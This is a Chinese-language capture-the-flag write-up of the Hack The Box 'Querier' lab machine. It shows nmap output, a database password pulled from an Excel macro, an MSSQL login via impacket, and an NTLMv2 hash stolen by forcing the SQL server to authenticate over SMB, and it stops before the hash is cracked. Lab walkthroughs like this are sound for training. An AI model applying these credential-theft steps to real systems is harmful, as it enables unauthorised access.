Hackthebox - Querier

hextuff

2023-05-11 (Updated: 2024-03-31)

Querier

10.10.10.125

nmap

# Nmap 7.92 scan initiated Mon May  8 14:25:59 2023 as: nmap -e tun0 -sC -sV -oA nmap/default -v 10.10.10.125
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.125
Host is up (0.89s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
|_ssl-date: 2023-05-08T06:27:27+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-08T06:22:51
| Not valid after:  2053-05-08T06:22:51
| MD5:   fdf1 4172 6b74 814d beb3 94e4 53b3 9df3
|_SHA-1: 1673 5504 5349 0d0c 5a3c 9aac 81e7 c36b f4fc 8516
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-05-08T06:27:14
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  8 14:27:26 2023 -- 1 IP address (1 host up) scanned in 86.80 seconds

smb 文件下载

通过 smbclient -L 10.10.10.125 下载到文件
Currency Volume Report.xlsm: Microsoft Excel 2007+

excel 文件内容

vbProject.bin 文件内容

database=volume
uid=reporting
pwd=PcwTWTHRwryjc$c6
可能是 mssql 的密码？

这里分析这里文件发现了一个有用的工具：oletools
其中的 olevba 可以非常方便的处理 excel 文件，解析出其中的 vb 代码，可读性一下子就提高了。

Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

可能的用户名

Luis

mssql 数据库

这里的 impacket 被我之前瞎几把装别的包给搞不能用了，这里再一次提醒我搞 python 的环境一定要隔离。
最后还是用 docker 的版本拿来用了。。

在 mssqlclient.py 给了 -window-auth 参数之后，成功连上了数据库。

偷 hash

成了！

权限

reporting 的权限比较低，接下来试试偷 hash。

用户列表

QUERIER\reporting
sa

库名

版本

ntlm hash 破解

从 mssql 调 smb 偷到了 hash：

1
2
3

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:787361df2b95bda0:438D996E62AFDDEADE0E0DC0DA4C5A88:01010000000000000060CC5D5284D901AE26DE384A0B6B1700000000020008004C004D003800420001001E00570049004E002D00440057005100510045004B0050004D004A003800460004003400570049004E002D00440057005100510045004B0050004D004A00380046002E004C004D00380042002E004C004F00430041004C00030014004C004D00380042002E004C004F00430041004C00050014004C004D00380042002E004C004F00430041004C00070008000060CC5D5284D901060004000200000008003000300000000000000000000000003000006DA1DC5D14BCB857F2DD61D00638764940B601F2330F9DB81C7C648692A1CBD00A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003200000000000000000000000000

这里丢进 hashcat 跑一下